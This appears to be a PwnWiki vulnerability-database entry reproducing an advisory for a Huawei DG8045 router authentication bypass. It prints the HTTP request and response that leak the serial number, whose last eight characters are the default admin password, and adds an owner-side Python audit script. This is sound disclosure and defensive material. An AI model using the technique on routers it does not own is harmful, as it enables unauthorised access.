A free, open vulnerability database that anyone can edit (PwnWiki.Com)
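This vulnerability has been verified
The EXP/POC/Payload on this page has been tested and works; the vulnerability has been successfully reproduced.
Affected versions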
Version: dg8045
POC
# Title: Huawei dg8045 - Authentication Bypass
# Date: 2020-06-24
# Author: Abdalrahman Gamal
# Vendor Homepage: www.huawei.com
# Version: dg8045
# Hardware Version: VER.A

#POC:
The default password of this router is the last 8 characters of the device's serial number, which is found on the back of the device.

An attacker can leak the serial number via the web app API, as follows:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close

************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Thu, 24 Jun 2021 02:07 GMT+2
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/

The last 8 characters/digits of that serial number can then be used to log in to the router.
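
An audit check for the owner of such a router, added here as an example and not part of the original advisory: it parses a captured /api/system/deviceinfo response body and reports whether the serial number is exposed and whether the admin password currently set is still the serial-derived default. The function names, finding labels and the admin_password parameter are assumptions made for this example; the sample body is the one shown in the PoC above.

```python
import hmac
import json
import re

# Constructed sample: the response body shown in the PoC above.
SAMPLE_BODY = ('while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081",'
               '"ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/')

# The router wraps its JSON in `while(1); /* ... */`.
_WRAPPER = re.compile(r"^\s*while\(1\);\s*/\*(.*)\*/\s*$", re.S)


def parse_deviceinfo(body):
    """Strip the `while(1); /*...*/` wrapper and decode the JSON inside it."""
    m = _WRAPPER.match(body)
    payload = m.group(1) if m else body  # tolerate an unwrapped body
    try:
        data = json.loads(payload)
    except json.JSONDecodeError:
        return {}  # error page, login redirect, etc.
    return data if isinstance(data, dict) else {}


def audit(body, admin_password):
    """Return findings for one unauthenticated deviceinfo response.

    admin_password is the password currently set on the audited router,
    supplied by its administrator (hypothetical parameter).
    """
    info = parse_deviceinfo(body)
    serial = str(info.get("SerialNumber") or "")
    findings = []
    if serial:
        findings.append("serial-exposed")
        # Default password per the advisory: last 8 characters of the serial.
        if len(serial) >= 8 and hmac.compare_digest(
                admin_password.encode(), serial[-8:].encode()):
            findings.append("default-password-in-use")
        elif len(admin_password) >= 4 and admin_password in serial:
            findings.append("password-derived-from-serial")
    return findings


if __name__ == "__main__":
    print(audit(SAMPLE_BODY, "change-me-Long-Passphrase"))
```

A "serial-exposed" finding alone means the default credential is recoverable from the LAN, so the admin password has to be changed to something unrelated to the serial number.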